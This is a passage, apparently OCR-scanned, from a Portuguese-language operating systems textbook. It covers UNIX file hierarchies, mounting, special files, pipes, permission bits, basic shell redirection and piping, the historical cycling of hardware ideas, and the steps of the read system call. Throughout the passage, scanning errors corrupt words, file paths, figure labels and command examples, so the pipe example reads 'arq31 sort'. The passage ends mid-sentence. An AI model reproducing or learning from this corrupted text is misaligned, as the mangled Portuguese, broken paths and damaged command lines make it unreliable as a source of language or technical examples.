ni co e ainda outro para sua pagina da Web. Sao neces- 
sarias chamadas de sistema para criar e remover diretó- 
rios. Tambem sao fomeddas chamadas para colocar um 
arquivo em um diretório e remove-lo de la. Eniradas de 
diretório podem ser arquivos ou outros diretórios. Esse 
modelo da origetn tambem a omra hierarqina — o sis¬ 
tema de arquivos — conforme mostra a Figura 1J4. 

Hierarquias de proccssos c dc arquivos sao orga ni za¬ 
da s como arvores, mas a semdhanęa acaba a i Hicrarąuias 
de proccssos normaimente nao sao muito profundas (mais 
de tres niVds nao ć comum); ja hicrarąuias dc arquivos 
compóem-se, cm gerai, de ąualro, cinco ou mais nfveis dc 
profundidadc. Hicrarąuias dc proccssos costumam terpou- 
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Diretório-raiz 



I Figura ci 4 Sistema de arquivos para um departamento universitario. 


co tempo tle vida, no maximo aiguns minutom enquauto 
liierarąuias de diretórios podem existir por anos. Proprie- 
dade e proteęao lambem diferem emre processos e arqub 
vos. Normalnienie, apenas um processo pal pode contro lar 
ou acessar um processo Id ho, mas quase scmpre existem 
mecanismos para que arquivos e diretórios sejam lidos por 
um grupo mais amplo quc apcnas pclo proprictario. 

Cada arquivo demro da hierarquia de diretórios pode 
ser espeeificado fornecendo-se o caminho {paih name) a 
partir do topo da hierarąuia de direiórios, o diretório-raiz, 
Esses ca mi nh os absolut os forma m u ma lista de diretórios 
qtic dcvc ser percorrida a partir do dirctório-raiz para che- 
gar atć o arquivo, com barras separando os componentes. 
Na Figura 1.14, o caminho para o arquivo CSWl e fProfesso- 
res/Prof.Erown/CursosiCS101. A primetra barra indica que o 
caminho e absolutu, isto e r parte-se do diretório-raiz. Uma 
observaęao: no MS-DOS e no Windows, o caractere barra 
iiwertida (\) e usado como separador, em vez do caractere 
barra (/); assirn, o caminho do arquivo dado acima seria cs- 
crit o com o \ Profesśom\Prof. Brown\Cu rsos\CS 10 L N e st e I i vro 
usaremos geralmentc a convcnęao UNIX para ca mi nh os. 

A todo moment o, cada processo tern um diretório do 
trabalho a mai no qual sao buscados no mes de caminhos 
qtie nao se hiiciam com unia barra* Por exemplo, na Fi¬ 
gura 1.14, sc /Professores/Prof.Brown for o diretório de tra- 
balho, entao o uso do caminho Cursos/CSWI resultara no 
mesmo arquivo do caminho absolmo dado anteriormente. 
Os processos podem mu dar seu diretório a mat emitindo, 
para isso, uma chaniada de sistema especificando o novo 
diretório de trabalho. 


Antes que possa ser lido ou escrito, um arquivo precisa 
ser aberto e, nesse inomemo, as permissoes sao verificadas. 
Se o acesso for permitido, o sistema retorna um pequeno 
valor inteiro, chamado descritor de arquivo, para usa-lo 
em operaęoes subsequentes. Se o acesso for proibido, um 
código de en o sera retorna do, 

Omro conceito importante em UNIX c o de montagem 
do sistema de arquivos. Quasc todos os computadores pessoais 
tern uma ou mais unidades dc discos flexfveis nos ątiais CD- 
-ROMs e DVDs podem ser inseddos e removidos. El es quase 
sempre tern portas USB, nas quais dispositivos de memória 
USB {na verdade, unidades de disco dc estado sólido) po- 
dcm ser cooectados, e algtnis computadores possuem dis¬ 
cos flcxiveis ou discos rigidos extcrnos. Para fomecer um 
modo md hor dc trata r com meios removiveis, o UN1X per- 
mile que o sistema dc arquivos cm um CD-ROM ou DVD 
seja agregado a arvore prinripaL Considerc a situ a ęa o da Figura 
1.15(a). Antes de uma chaniada mount, o sistema de arqui- 
vos-raiz no disco rfgido e um segundo sistema de arquivos em 
um CD-ROM estao separados e nao estao reladonados. 

Contudo, o sistema de arquivos em um CD-ROM nao 
pode ser usado, pois nao lii urn modo dc especificar cami- 
nhos {path mmes) nde. O UNIX nao permiie que caminhos 
sejam prefixados por um nonie ou nu mero de disposiiivo 
aęionador. Esse seria exatamente o tipo de dependencia ao 
dispositivo que os sistemas operacionais precisam eliminar. 
Em vez disso, a chaniada de sistema mount permite que o 
sistema de arqutvos em CD-ROM seja agregado ao sistema 
dc arquivos-raiz scmpre que seja solicitado pdo programa. 
Na Figura 1.15(b), o sistema dc arquivos em CD-ROM deve 
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Raiz CD-ROM 



(a) 



(b) 


Figura 1.15 (a) Antes da montagem, os arquivos no CD- 
-ROM nao estao acessLeis. (b) Após a montagem r tomam-se 
parte da hierarguia de arquivos> 


sermontado no diretório b, permilindo, com isso, o acesso 
aos arquivos fbix e /bfy. Se o direlório b contivesse algum 
arquivo, esse arqińvo nao estaria acessfvel enquamoo CD- 
-ROM estivesse montado, ja que /itse referiria ao diretório- 
-raiz do CD-ROM. (A impossibiłidade de acesso a esses ar- 
quivos nao e um problema tao serio qnanto parece: sistema 
de arquivos sao quasc sempre montados cm diretorios va- 
zios.) Se um sistema contwer multiplos discos ngidos, eles 
poderao ser montados tambem cm u ma u ni ca arvore. 

Outro conceito importante em UNIX e o de arqtiivo es- 
pecial Os arqtiivos especiais perm i Lem quc dispositivos de 
E/S parcham-sc com arquivos, Dcsse modo, des podem ser 
lidos c escritos com as mes mas cbamadas de sistema usadas 
para lei e escrever arquivos. Esistem dois tipos de arquivos 
especiais: arquivos especiais de bioco e arquivos espe« 
ciais dc caracteres, Os arquivos especiais dc bioco sao usa- 
dos para inoddar dispositWos que formam unia coleęao de 
błocos aleatorianieme cndereęavei$, como discos. Abrindo 
um arquivo especial de blocos e lendo o bioco 4, um pro- 
grama pode ter acesso direto ao quatto bioco do dispositwo, 
sem se prcocupar com a estruUua do sistema de arquivos 
comido nele, Da mesma maneira, os arquivos especiais de 
caracteres sao u sad os para modę lar impressoras, modems e 
outros dispositivos que recebern on cnviam caracteres serial- 
mente* Por coiwenęao, os arquivos especiais sao mantidos 
no direlório /dev. Por exemplo, /dev/lp pode ser urna impres- 
sora (antes chamada de impressora de lin ha), 

O ultimo aspecto que discutiremos aqui e o que rela- 
dona processos e arquivos: os pipes. Um pipę e um lipo 
dc pseudoarquivo quc pode ser usado para conectar dois 
processos, conformc ilustra a Figura Li6. Sc os processos 
A e B quiscicm sc comimicar usando um pipę, eles dcvcrao 


Processo Processo 

I Figura 1.16 Dois processos conectados por um pipę, 

ser conftgurados antecipadameme. Se um processo A pre- 
tende erwiar dados para o processo o processo A escrevc 
no pipę como se cle fosse um arquivo de safda. De Tato, a 
implemcntaęao de um pipę e muito semelhante a de um 
arquivo. O processo B pode ler os dados lendo-os do pipę 
como se esse fosse um arquivo de entrada. Assim, a com u- 
nicaęao entre os processos ciii UNIX assemelha-sc muito 
com IciLuras e escritas de arquivos comuns. A linica ma- 
nęka de um processo 'ficar sabendo r se o arquivo de saida 
em que esta escrcvendo nao e realnienie um arquivo H mas 
na verdade um pipę, e fazendo urna chamada de sistema 
especial. Sistemas de arquivos sao muito importu mes. Tere- 
mos muito mais a dizer sobre eles nos capftulos 4 # 10 e U. 

1-5.41 Entrada e saida 

Todos os compuladorcs tem dis posili vos fisicos para 
entrada e saida, AfinaL para que serviria um computador 
se os usuarios nao pudessem dizer o que deve ser feito e 
nao conseguissem verificar os resulmdos depois do irabalho 
soli ci lado? Existem varios tipos de disposilivos de entrada 
e saida, como leclados, monitores e impressoras. Cabe ao 
sistema operadonal gerenciar esses dispositivos. 

Conseąuentemente, todo sistema operadonal possui 
um subsistema de E/S para gerendar sens dispositivos dc 
E/S- Alguns dos pi ogra mas de E/S sao independentes de 
dispositivo, isto e, apiicam-sc igualmente bem a imiitos ou 
a todos os dispositivos, Outras partes dele, como os dnvers 
de dispositivo, sao cspecfficas a cada dispositivo de E/S. No 
Capftulo 5 estudaremos a programaęao de E/S, 

1-5.51 Seguranca 

Computadores contem muitas informaęoes que os 
usuarios, muitas vezes, querem manier confidendais. Essas 
informaęoes podem ser memagens de correio eletronico, 
planos de negócios, impostos devidos etc. Cabe ao sistema 
operadonal gerendar o sistema de seguranęa para que os 
arquivos, por excmpio, sejam acessiveis apenas por usua¬ 
rios autorizados. 

Como um exemplo simples, apenas para termos urna 
ideia de como a seguranęa pode fund ona r, considere o 
UNIX, Arquivos em UNIX sao protegidos atribumdo-se a 
cada um deles um código de proteęao de 9 btts. O código de 
protecao consistc em campos de 3 bits, um para o proprie- 
tario, um para outros membros do grupo do proprictario 
(os usuarios sao divididos cm grupos pelo adniinistrador do 
sistema) c outro para qualqucr usuario. Cada campo tem 
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uni bit de permissao de leitura, urn bil de permissao de es- 
crita e outro bit de permissao de execuęao. Esses 3 bits sao 
conheddos como bits rwx. Por exemplo, o código de pro- 
teęao vwxr~x-x significa que o proprietario pode ler {nad), 
cscrcvcr (write) on exccutar iexmde) o arquivo, quc outros 
membros do grupo podcm ler ou cxccutar (mas nao escre- 
vcr) o arquivo, e qiuilqucr um pode cxecutar (mas nao kr 
ou cscrever) o arquivo. Para um diretório, jrindica a per¬ 
missao de busca. Um traęo significa ausencia de permissao, 

Alem da proteęao ao arquivo P ha muitos outros tópicos 
sobie s egu ranę a. Proteger o sistema contra intrusos itidese- 
javeis, humanos ou nao (por exemplo, vtms), ć um deles. 
Estudaremos vaiios desses assuntos dc seguranęa no Ca- 
pftulo 9* 

1.5.61 o interpretador de comandos (słiell) 

O sistema operarional e o código que execuia as cha¬ 
ma das de sistema. Editores, eompiladores, montadores, li- 
gadores (linkers) e interpretadores de comandos nao fazem, 
com certeza, parte do sistema operadonal, mesmo sendo 
importantes c utcis. Corrcndo o risco de confundir um 
pouco as coisas, nesta seęao estudaremos resumidamente 
o interpretador de comandos do UN1X, cha mado shell. 
Embora nao seja parte do sistema operadonal, o shell Jaz 
uso intensivo de muitos aspectos do sistema operacional e 
servc, assim, como um bom exemplo sobi e como as cha- 
madas de sistema podem ser usadas. Ele e tambem a inter- 
face prindpal entre o usuario a frente de seu terminal e o 
sistema operadonal, menos que o usuario esteja usando 
unia interface grafica de usuario. Existem muitos shells, 
dentre cles o sh f o ah, o ksh e o bash, Todos des dao su por¬ 
te a funcionalidade descrita a seguir, que deriva do shell 
original (^}. 

Quando um usuario sc coneda, um shell e imciado. 
Esic tem o terminal como cmrada-padrao e satda-padrao. 
Ele iuida emitmdo um caractere de prompt (prontidao) — 
por exemplo, o cifrao — que diz ao usuario que o shell esta 
esperando receber um comando. Se o usuario emao digitar 

datę 

por cxemplo, o shell cria um processo filho e executa o 
programa datę utilizando a estruturn dc dados desse pro¬ 
cesso filho. Enquanto o processo filho cstiver cm cxccu- 
ęao, o shell pcrmanecc aguardando-o tcrminar. Quando o 
processo filho e finalizado, o shell emite o sinal dc prompt 
novamente e lenta ler a próxima iinha de entrada. 

O usuario pode espedficar que a safda-padrao seja re- 
direcionada para um arquivo, por exemplo, 

datę >arq 

Do mesmo modo, a enirada-padrao pode ser rcdirccio- 
nada, como cm 

sort <arq 1 >arq2 

quc invoca o programa sort com a entrada vindo dc arql c 
a saida enviada para arq2. 


A safda de um programa pode ser u sad a como a en- 
trada para outro programa conectando-os por meio dc um 
pipę. Assim, 

cat arq1 arq2 arq31 sort >/dev/lp 

invoca o programa cat para concatenar trćs arquivos c cn- 
vjar □ safda para quc o sort organize todas as Itnhas cm or- 
dcm alfabetica. A satda de sort e rcdirecionada ao arquivo / 
dev/lp t que norma!menie c a impressora. 

Sc um usuario colo car o caractere & após um coman¬ 
do. o shell nao vai esperar que cle terminc e P assim, envia 
imediatamente o caraaerc de prompt. Comeąucnicmeme, 

cat arq1 arq2 arq3 | sort >/dev/lp & 

i nicią o sort como urna larefa cm background, perm i Lin¬ 
do que o usuario coniinue trabalhando normalmeme en- 
ąuanto a ordenaęao prossegue. O shell tem varios outros 
aspectos imeressantes, que nao temos espaęo para discutir 
aqui. A materia dos livros śobre UNIX a bonia detidamente 
o shell (por exemplo, Kemighan e Pikę, 1984; Kochan c 
Wood, 1990; Medineis, 1999; Newham e Rosenblatl, 1998; 
Robbins, 1999). 

Atualmcntc, muitos computadorespessoais usam uma 
interface grafica GUI, Dc lato, a interfacc GUI ć apenas um 
programa sendo executado na camada superior do sistema 
operadonal, como um shell. Nos sistemas Unux # esse fato 
se tonią óbvio porque o usuario tem unia cscolha de (pdo 
menos) duas interfaces GUlsr Gnomę e KDE ou neiihuma 
(usando uma janela do terminal no XIi). No Windows, 
tambem e poss(vel substiiuir a arca de trabaiho com in¬ 
terface GUI padrao (Windows Explorer) com um progra¬ 
ma diferente altcrando alguns valores no registro, embora 
poucas pcssoas o faęam. 

1-5-71 Ontogenia recapitula a filogenia 

Depois que o livro A oriifem das espedes, de Charles Dar¬ 
win, foi puhlicado, o zoólogo alemao Ernst Haeckel afir- 
mou quc a “ontogenia recapitula a filogenia". Com isso cle 
ąucria dizer que o desenvolvi.mento de um embriao (on- 
togenia) repeto (isto c, rdembra) a evoluęao das espedes 
(filogenia). Em ouiras palavras, depois da krtilizaęao, um 
embriao hu mano passa por estagios de um peixe P de um lei- 
tao e assim por dianie, ale se tornar um bebe humano. Bió- 
logos modeinos consideram cssa afimiaęao uma simplifica- 
ęao grosseira, mas no fundo ha ainda alguma vcrdade nela. 

Algo ligeirameme anśiogo tem aconiecido na industria 
da compuiaęao. Gada nova especie (computador de grandę 
porte, mi ni computador, computador pessoal, computador 
embarcado, cartoes inteligentes etc.) parece passar pelo 
mesmo desenvolvimento de seus ancestrais, tamo tio que 
se refere ao hardware como ao software. Esąuecemo-nos 
frcqucntemcmc dc quc muito do quc acontece na indus¬ 
tria da computaęao c cm muitos outros campos e oricnlado 
pela tccnologia. A razao pcla qual os romanos nao tinham 
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carros nao e porque des gostavam muito de caminhar. t 
porąue eles nao sabiam como construf-los. Computadores 
pcssoais nao existem porque miłhoes de pessoas tem um 
desejo comido por muitos sćculos de ter um computador, 
mas porque agora c posstvd fobrica-los dc modo mais ba- 
rato. Muitas vczcs nos csąucccmos dc como a tccnologia 
a feta nossa visao dos sistemas e dc qnc convcin rcfletir so- 
bre o assunio dc vez cm ąuando, 

Em particuiar, frequeiileniente urna alteraęao tecno- 
lógica torna alguma ideia obsoleta e ela desaparece rapi- 
damemc. Em ret ant o, outra mudanęa tccnológica poderia 
reaviva-la. Isso e csperialmcme vcrdadeiro quando a al¬ 
teraęao tem a ver com o desempenho rclativo dc pailcs 
diferentes do sistema. For excmplo, quando as CFUs sc 
torna m muito mais vdozcs quc as memórias, as c ach es 
sc toinam importanies para acelerar a memória lenta', Sc 
a nova tccnologia de memória algum dia tornar as me- 
mórias muito mais velozes que a CPU, as caches desapa- 
recerao. E, se urna nova tecnologia de CPU torna-las mais 
velozes que as memórias novameme, as cadies reaparece- 
rao, Em biologia, a extinęao e definitlva, mas ern ciencia 
da compntaęcio ela as vczcs ocorre por apenas alguns anos. 

Como conseąuenda dessa impermanencia, neste livro 
examinaremos conceitos 'obsoleios' de vez em quando, 
isto e, ideias que nao sao as mais adequadas a tecnologia 
atual. Entretanto, mudanęas tecnológicas podem trazer de 
voka alguns dos chamados 'conceitos obsoletos'. Por isso, 
e importante compreender por que um conceito e obsoleto 
c qnais mudanęas no ambiente podem traze-lo de volta. 

Para esdarecer esse porno, consideremos um exem- 
plo shnplcs. Os primeiros coniputadores tinham conjuntos 
de ins&ntęóes implememadas no hardware. As instruęoes 
eram execmadas di rei a menie pelo hardware e nao po¬ 
dłam ser alteradas. Mais tarde veio a microprogramaęao 
(introduzida pcla primeira vez em grandę e scal a com o 
IBM 360), na qual um interpretador subjaceme execntava 
as Instruęoes do hardware' no software. A execuęao ffsica 
sc tomou obsoleta. Nao era snfidentemente flexivel. Em 
seguida, os coniputadores RISC [oram irweniados c a mi¬ 
croprogramaęao (isto e, execuęao interpretada) se tomou 
obsoleta porque a execuęao direta era mais veloz. Agora es- 
tamos vendo o ressurgimento da rcimcrprctaęao na forma 
de applets Java quc sao cnviados pcla Internet c interpreta- 
dos após a chcgada. A velocidade de execuęao nem sempre 
c crucial, porquc rciardos na redc sao tao grandes quc des 
tendem a predominan Dessa forma, o pendulo ja oscilou 
emre diferenies ciclos de execuęao direta e imerprdaęao e 
pode oscilar novamcntc no futuro. 

Memórias grandes 

Examinemos agora alguns desenvolvimentos históri- 
cos de hardware e o modo como afetaram os softwares re- 
petidamente. Os primeiros coniputadores dc grandę porte 
tinliam memória limitada. Um IBM 7090 ou 7094 com- 
pletamcntc carrcgados, quc tinham supremacja do finał dc 


1959 ate 1964, tinham apenas 128 KB de memória. Eles 
eram, em sua maior parte, programados em linguagem as¬ 
sembly c sous sistemas operadonais eram cscritos em lin- 
gna gem assembly para economi zar memória predosa, 

Com o passar do tempo, compiladores para linguagens 
como Fortran c Cobol se desen vol vcram o su fkientc para quc 
a linguagem assembly fosse considerada mona. Mas quan- 
do o prinieiro minkomputador comercial (o PDP-1) foi lan- 
ęado, Linha apenas 4.096 palavras de memória de 18 bitse a 
linguagem assembly tcve u ma recuperaęao surpreendente. 
No firn, os microcomputadores adquiriram mais memória 
e as linguagens de alio mvel sc torna ram predomi nanieś. 

Quando os microcomputadores se toruaram um su- 
cesso, no infdo da decada de 1980, os primeiros tinham 
memórias dc 4 KB c a programaęao assembly ressurgiu 
dos mortos. Coniputadores embarcados niuitas vczcs usa- 
vam os mesmos chips dc CPU que os microcomputadores 
(SOSOs, ZSOs e, mais tarde, SOSós) e lambein eram micial- 
mente programados em linguagem assembly. Agora sens 
descendentes, os computadores pessoais, tem inuita me- 
mória e sao programados em C C++, Java e outras lingua¬ 
gens de alto nfvel Os cartoes iti te ligę mes estao passa ndo 
por desenvolvimentos semelhantes, embora sempre te- 
nham, alem dc celi as extensóes* um interpretador Ja va e 
executcm programas Java dc modo intcrpretativo, em vez 
de compilarcm o Java para a linguagem de maąnina do 
cartao inieligente. 

Hardware de proteęao 

Os primeiros computadores de grandę porte, como o 
IBM 7090/7094, nao possuiam hardware de proteęao, por 
isso cxecuiavam apenas um prograrna por vez. Um pro- 
grama defeituoso poderia a pa gar o sistema operacional e 
quebrar a maquina com facilidade. Com a introduęao do 
IBM 360, unia forma primitiva de hardware dc proteęao 
foi disponibilizada e essas maquinas puderam amiazenar 
varios programas na memória simultaneameiite e permitir 
que estas sc alternasscm na exccuęao (multiprogramaęao). 
A monoprogramaęao fot dedarada obsoleta. 

Pelo menos ate o surgimento do primeiro minicompLi- 
tador — sem hardware de proteęao — a multiprogramaęao 
nao era posswel O POP-1 e o PDP-8 nao tinliam nenhum 
hardware de proteęao, mas o PDF- II possiua, e essa ca- 
ractcrfstica lcvou a multiprogramaęao c, no firn, ao UNIX. 

Quando os primeiros microcomputadores foram cons- 
t rui dos, usavam o chip de CPU Intel 8080, que nao tinha 
nenii unia proteęao dc hardware; assim, voltamos a mo¬ 
li oprog rama ęa o. Foi soniente com o surgimento do Intel 
80286 que essa proteęao de hardware foi acrescentada e 
a multiprogramaęao se tomou possfvel Ate hoje, muitos 
sistemas embarcados nao tem hardware de proteęao e exe- 
cmam apenas um prograrna. 

Agora obscn r cmos os sistemas operacionais. Os primci- 
ros computadores dc grandę porte nao possuiam hardware 
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ile proteęao nem davam suporte a multiprogramaęao. Desse 
modo, nelcs eram execuiado$ sistemas o porad ona i s simples 
qne tratavam apenas um programa por vez, carregado nia- 
nualmente. Mais tarde eles adquiriram o suporte de hardware 
de proteęao e do sistema operacional para lid ar com varios 
programa s de u ma vez e r posteriormente, com a rampie ta ca- 
packi a de de suporte ao uso com companilhamemo de tempo. 

Quando os minicomputadores surgiram, tambem nao 
tinham protcęno dc hardware, c os programas eram cxecu- 
tados um a um, carregados manuał menie, embora a mul- 
tiprogramaęao ja estivesse bem estabeledda no mundo dos 
compuladores de grandę porte. Aos po u cos, adąuiriram a 
protcęao dc hardware e a capacidadc de executar dois ou 
mais programas simu franca menie. Os primeiros microram- 
puiadorcs eram capazes, ainda, de executar somente um 
programa por vez, mas depois passa ram a comar com a ca- 
pacidade de multiprogramaęao. Os compuladores porta teis 
e os cartóes inteligentes seginram pelo mesmo caminho. 

Em todos os casos, o dcscnvolvimento do software foi 
ditado pela tccnologia. Os primeiros microcomputadores, 
por excmplo, tinham algo como somente 4 KB dc mcmó- 
ria c rtenhum hardware dc protcęao. Linguagens de alto nivet 
e muUiprogramaęao eram simplesmentc grandes demais 
para serem tratadas cm sistemas tao peąucnos. A rnedida 
que os inicrocompmadores cvolufram, tornando-se rno- 
dcmos compuladores pcssoais, adąuiriram o hardware c o 
software necessarios para i rata r aspectos mais avanęados. 
Provavdmente esse deseń volvimento contimiara. Outros 
campps tambem parcccm ter csse dclo dc reencamaęao 
evohUiva, mas, na ind ustna dos compuladores, cle parecc 
girar mais rapido. 

Discos 

Os primeiros compntadores de grandę porte eram em 
grandę rnedida baseados em fila magnetiea. Eles cosiuma- 
vam ler um programa a partir da lita, compila-lo, execuia-Io 
e escrever os resultados de voha em mitra fi ta. Nao havia 
discos e neiihuni concetto de um sistema de arquivos. Isso 
comeęou a mudar ąuando a IBM introduziu o primeiro 
disco rigido — o RAM AC (RAntfoM ACcess t acesso aleató- 
rio) em 1956. Ele ocupava cerca de 4 metros ąuadrados de 
espaęo e podia armazenar cinco milhoes de caracteres de 7 
bils, o suficiemc para urna foto digilal de resoluęao media. 
Mas com o valor do aluguel anual de $35.000, montar a 
ąuantidade sufieiente deles para armazenar o equivalente a 
um rolo de filme nmito rapidamente tornou-se taro, Mas, 
no firn, os preęos eafram e sistemas de arqmvos primiiivos 
fo ra m de sen vo I v i do s. 

O CDC 6600 foi um desses desenvolvimentos tipi cos, 
introduzido cm 1964 c, durantc muitos anos, o computa- 
dor mais rapido do mundo. Os usuarios podlani criar os 
chama dos 'arquivos permanentes' dando-lhes nomes e es- 
perando qne ncnhinn outro usuario tambem tivcssc dcci- 
dido qnc, por excmplo, 'dados' fosse um nomc adequado 
para um arquivo, Tratava-sc dc um diretório dc um mvch 
No firn, os compuladores dc grandc porte descnvolvcram 


sistemas de arquivos hierarquicos complexos f que por aca- 
so culminaram no sistema de arquivos MULT1CS. 

Quando os minicomputadores comeęaram a ser usa- 
dos, elcs tambem tinham discos rigidos. O disco-padrao 
no PDF-II, quando foi introduzido cm 1970, era o disco 
RKG5, com unia capacidade de 2,5 MB, cerca de metade do 
RAMAC IBM, mas tinha apenas cerca de 40 cm de diame- 
tro e 5 cm de altura. Mas ele tambem tinha um diretório 
de um mvei inicialmentc. Quando os microcomputadores 
forain lanęados, o CP/M foi, a principio, o sistema opera- 
cional predominantc e tambem dava suporte a apenas um 
diretório no disco {flexfvd). 

Memória virtual 

A memória virtual (discutida no Capitulo 3) confere a 
capacidade de executar programas malores que a memória 
ffsica da maquina movendo peęas entre a memória RAM e 
o disco. Eia passou por um descnvolvi niemo semelhantc, 
aparecendo primeiro em compuladores de grandę porte, 
depois cm mini e microcomputadores. A memória virtual 
tambem ativou a capacidade de conectar de modo dinami- 
co um programa a urna biblioteca no memento de execu- 
ęao em vez dc com pila-1 o. O MULTICS foi o primeiro sistc- 
ma a permitir isso. No lim, a idcia se propagou ao longo da 
linha e agora ć amplamcntc usada na maioria dos sistemas 
UNIX e Windows. 

Em todos esses descnvolvimcnios, vemos ideias quc 
sao invemadas em um contexto, sao descartadas mais tar- 
de quando o contexto mu da (programaęao de linguagem 
assembly, monoprogramaęao, diretórios dc um mvel ctc.} e 
reaparecem em um contexto diferente, muitas vezes urna 
decada depois. Por essa razao, nestc livro algumas vezes 
examinaremos ideias e algoritmps que podem parecer ob- 
soletos nos PCs de gigabytes de boje, mas que podem retor- 
nar em compuladores embarcados e cartóes inteligentes, 



Chamadas de sistema 
(system calls) 


Yimos que sistemas operacionais tem duas funęoes 
principais; fornecer abstraęoes a os programas de usuarios 
e administrar os recursos do computador. Em sua maior 
parte, a interaęao entre programas de usuario e o sistema 
operacional lida com a primeira; por exemplo, criar, escre- 
vcr, ler e excluir arquivos. A parte de gcrcnciamcnto dc 
recursos e, em grandę rnedida, transparenie para os usua¬ 
rios e feila aiHomaticamente, Desse modo, a interface cn- 
tre o sistema operacional c os programas dc usuarios trata 
primeiramente sobre como Udar com as abstraęóes. Para 
entender o que os sistemas operacionais fazem realnienie, 
devemos observar essa interface mais dc perto. As chama¬ 
das de sistema disponweis na interface variam dc um sis- 
tcnia operacional para outro (embora os conccitos basicos 
tendam a ser pareddos). 
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Somos, assim, foręados a escolher entre (1) generali- 
dadcs vagas ( w os sistema s operadonais possuem chamadas 
de sistema para lei tura de arquivos") e (2) algum sistema 
espedfico rUNIX possui urna chamada dc sistema read com 
tres parametros: urn para cspecificar o orqihvo, urn para in- 
fonnarondc os dados dcverao ser tolocados e um para indi- 
car quantos bytes dcvcrao ser lidos^)* 

Escolhemos a ultima abordagem. £ mais trabalhosa, 
mas permite entender melhor o que os sistemas operadonais 
realnienie fazenn Embora essa discussao refira-se especifi- 
camente ao P0$IX (Padiao Iniemaciona1 9945-1) — eon- 
seąueniemcme tambem ao UNIX, System V, BSD, Lmux, 
M1NIX 3 etc. — # a maioria dos outros sisLcmas operadonais 
modernos tern chamadas de sistema que desempenham as 
mesmas funęóes, diferindo apenas nos detalhes. Como os 
mccanismos reais para cmissao de urna chamada de sislc- 
ma sao altameme depeodentes da maquina e muitas vezes 
devem ser otpressos em código assembly, e disponibilizada 
urna biblioteca de rotinas para lornar poswel realizar cha- 
madas de sistema a panir de pr ogra mas em C e tambem, 
muitas vezes, a partir de programas em out ras linguagens. 

Convem ter em mente o seguinte; qualquer computa- 
dor com urna uniea CPU pode executar somente unia ins¬ 
truęao por vez. Se um processo estiver execulando um pro- 
grama de u su ario em modo usuario e predsar de um semęo 
do sistema, como ler dados de um arquivo, tera de executar 
urna instruęao TRAP para transferir o controle ao sistema 
operadonal. Este verifica os parametros para, entao, desco- 
brir o que quer o processo que esta chamando. Em seguida, 
de exeaita uma chamada de sistema e ret oma o controle 
para a instruęao seguinte a chamada* Em cerlo sentido, fazer 
urna chamada de sistema e como realizar um lipo espedal de 
chamada de rotina, só que as chamadas de sistema lazem 
entrar em modo mi cle o e as chamadas de rotina, na o* 

Para esclarecer melhor o mecanismo de chamada de 
sistema, vamos dar uma rapida olhada na chamada de 
sistema nead. Conforme ja mendonado, ela tern tres parci- 
metros: o primeiro espedhea o arquivo, o segundo ć um 
ponteiro para o buffer c o terceiro da o numero de bytes 
que deverao ser lidos* Como cm quase todas as chamadas 
de sisteina, ela e chamada a partir de programas em C cha¬ 
mando urna rotina de biblioteca com o mesmo nonie da 
chamada de sistema: read. Uma chamada a partir de um 
programa em C pode ler o seguinte forma to: 

contador = read(arq, buffer, nbytes); 

A chamada de sistema (assim como a rotina de biblio¬ 
teca) retorna o numero dc bytes rcaJmentc lidos cm eon- 
tador * Esse valor c normalmente o mesmo de nbytes, mas 
pode sermenor se, porexemplo, o caracterc fim-de-arqui- 
vo for encontrado du ranie a leitura. 

Se a chamada dc sistema nao puder ser rcalizada, tan¬ 
io por causa dc um parametro hwalido como por um erro 
dc disco, o contador passara a valcr -1 e o numero do erro 
sera eoiocado cm uma variavd global, errno. Os programas 


devem veri(kar sempre os resultados de uma chamada de 
sistema para saber se ocorrcu um erro. 

As chamadas de sistema sao realizadas cm uma serie 
de passos* Para melhor esclarecer esse eonceito, ex aminem os 
a chamada read discutida anterionnente. Ant es da chamada 
da rotina read dc biblioteca, que c na verdade quem faz 
a chamada de sistema read, o programa quc chama read, 
antes de tudo, armazena os paramctros na pilha, conforme 
mostram os passos 1 a 3 na Figura 1.17. 

Compiladores C c C++ armazenam os paramctros na 
pilha em ordem inversa por razoes históricas (isso tern dc 
ver com fazer o primeiro parametro de printf, a cadeia de 
caracteres do forma to, aparecer no topo da pilha). O pri¬ 
meiro e o terceiro parametros sao chamados por valor, mas 
o segundo parametro e por referenci a — isso quer dizer 
que ć passado o endcrcęo do buffer (indicado por &}, c nao 
sen conteudo. Dat vem a ch amada real a rotina dc bi blinie- 
ca (passo 4). Essa instruęao e a chamada norma] de rotina, 
fasada para cha mar todas as rotinas. 

A rotina dc biblioteca, possivcl mente escrita em lingua- 
gem assembly, em geral coloca o numero da chamada de sis¬ 
tema em um local esperado pelo sistema operacional — por 
exemplo, cm um registrador (passo 5). Entao, dc executa 
urna instruęao TRAP para pass ar do modo u su ario para o 
modonilcicoc inidara cxccuqaocm umdctcmiinadoende- 
reęo dentro do nudeo (passo 6). A instruęao TRAP e, na ver- 
dade, basiante semelhante a chamada de rotina no sentido 
de que a instruęao seguinte e recebida de um local distante 
e o endcrcęo dc retorno ć salvo na pilha para uso posterior. 

Emretanto, a instruęao TBAP tambem diferc da instru- 
ęao cail (chamada de rotina) de dois niodos fundametitais* 
Primeiro, como efcito colateral, da desvia para o modo nu¬ 
deo. A instruęao dc chamada dc rotina nao altera o modo. 
Segundo, em vcz de fornecer um cndercęo absolut o ou 
relativo onde o procedimento esteja localizado, a insmi- 
ęao TRAP nao pode transferir para um endereęo arbitrario. 
Dependendo da arquitetura, ela tratisfere para um local 
fixo — ha um campo de S bits na instruęao, fornecendo o 
uidice cm uma tabela na memória quc contem cndcrcęos 
de transferencia — ou para o equivalente a isso. 

O código do nudeo que sc i nicią após a instruęao TRAP 
vertfica o numero da chamada dc sistema c, entao, o des- 
pacha para a rotina corrcta dc tratamento dessa chamada, 
geraimente por meto de uma tabela de punteiros que Lndl- 
cam as rotinas de tratamento de chamadas de sistema in- 
dexadas pelo numero da chamada (passo 7). Nesse porno, 
c executada a rotina dc tratamento da chamada dc sistema 
(passo 8). Uma vczquc a rotina dc tratamento ten ha tcmii- 
nado seu irabalho, o controle pode reiomar para a rotina 
dc biblioteca no cspaęo do usuario, na instruęao seguinte a 
instruęao TRAP (passo 9). Normalmente essa rotina retorna 
ao programa do usuario da mesma maneira quc fazem as 
chamadas dc rotina (passo 10). 
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Fndereęo 
OxFFFFFFFF ^ 


Espaęo do ) 
usuarto \ 


Espaęo do nucleo 
(Sistema operacionaE) 



Pracedimento 
read da 
biblioteca 


} Prag rama do 
usuśrio 

chamando read 


1 Figura 1,17 Ośli passos na reaiizaę&o da cha mada de sistema read (fd, buffer, nbytes). 


Para finalizar a tarcia, o programa do usuario devc lim- 
